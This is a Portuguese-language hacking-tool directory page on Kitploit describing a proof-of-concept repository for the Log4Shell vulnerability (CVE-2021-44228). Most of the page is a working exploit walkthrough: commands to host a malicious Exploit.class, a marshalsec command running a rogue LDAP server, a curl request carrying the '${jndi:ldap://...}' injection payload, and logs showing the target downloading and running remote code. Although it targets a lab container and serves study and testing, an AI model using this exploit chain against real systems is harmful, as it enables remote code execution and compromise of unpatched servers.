Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-44228 — PoC for CVE-2021-44228. | Kitploit
Ferramentas/GitHubGitHub/marcourbano/cve-2021-44228
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubmarcourbano/cve-2021-44228

CVE-2021-44228

PoC for CVE-2021-44228.

Ver Repositório
77há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Log4Shell POC (CVE-2021-44228)

O objetivo deste repositório é fornecer todos os componentes necessários para explorar o CVE-2021-44228, apelidado de Log4Shell, e mostrar como explorá-lo.

Os ingredientes necessários para explorar esta vulnerabilidade são os seguintes:

  1. Um Servidor LDAP que redirecionará a aplicação vulnerável para o exploit.
  2. Uma Aplicação Vulnerável (aplicação web Spring Boot vulnerável ao CVE-2021-44228) usando uma versão vulnerável do Log4J.
  3. O Exploit.class Java (e o arquivo Exploit.java correspondente) que será carregado pela Aplicação Vulnerável.
  4. Um servidor http a partir do qual a Aplicação Vulnerável baixará o Exploit.class malicioso.

Créditos:

  • O Servidor LDAP foi extraído do repositório Marshalsec de mbechler.
  • A Aplicação Vulnerável é a fornecida por christophetd.

Pré-requisitos:

  • Maven
  • Java
  • Docker
  • Python

Executando Servidor LDAP e Servidor HTTP

Servidor HTTP

1. Navegue até a pasta exploit e inicie o servidor http usando Python.

root@kitploit:~
python3 -m http.server PORT

Servidor LDAP

1. Navegue até a pasta ldap_server e compile o pom.xml

root@kitploit:~
mvn clean package -DskipTests

2. Navegue até a pasta target e inicie o servidor especificando http_server_ip e http_server_port

root@kitploit:~
java -cp ldap_server-1.0-all.jar marshalsec.jndi.LDAPRefServer "http://http_server_ip:http_server_port/#Exploit"

Nota: este comando executa o servidor ldap malicioso, forçando-o a responder com a URI do Exploit.class para toda consulta ldap.

Executando a Aplicação Vulnerável

Execute o contêiner docker da aplicação vulnerável

root@kitploit:~
docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

Nota: por padrão, estamos executando a aplicação vulnerável na porta 8080, sinta-se à vontade para alterá-la.

Exploração

Assim que a vulnerable_application, o ldap_server e o http_server estiverem em execução, envie uma requisição http maliciosa para o servidor vulnerável.

root@kitploit:~
curl VULNERABLE_APPLICATION_IP:8080 -H 'X-Api-Version: ${jndi:ldap://ldap_server_ip:1389/a}'

A vulnerable_application registrará o payload e realizará uma consulta ldap

root@kitploit:~
2021-12-24 18:48:14.644  INFO 1 --- [nio-8080-exec-1] HelloWorld: Received a request for API version ${jndi:ldap://10.0.2.15:1389/a}

O ldap_server responderá com a URI do Exploit.class

root@kitploit:~
Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to http://10.0.2.15:8443/Exploit.class

O http_server receberá uma requisição para Exploit.class

root@kitploit:~
Serving HTTP on 0.0.0.0 port 8443 (http://0.0.0.0:8443/) ...
172.17.0.2 - - [24/Dec/2021 19:48:14] "GET /Exploit.class HTTP/1.1" 200 -

Finalmente, podemos verificar que o exploit criou um novo arquivo no sistema de arquivos da vítima. Neste exemplo, precisamos verificar o sistema de arquivos do contêiner docker.

Referências

https://www.lunasec.io/docs/blog/log4j-zero-day/
https://github.com/mbechler/marshalsec
https://github.com/christophetd/log4shell-vulnerable-app

Contribuidores

@CrashOverflow

Baixar ferramenta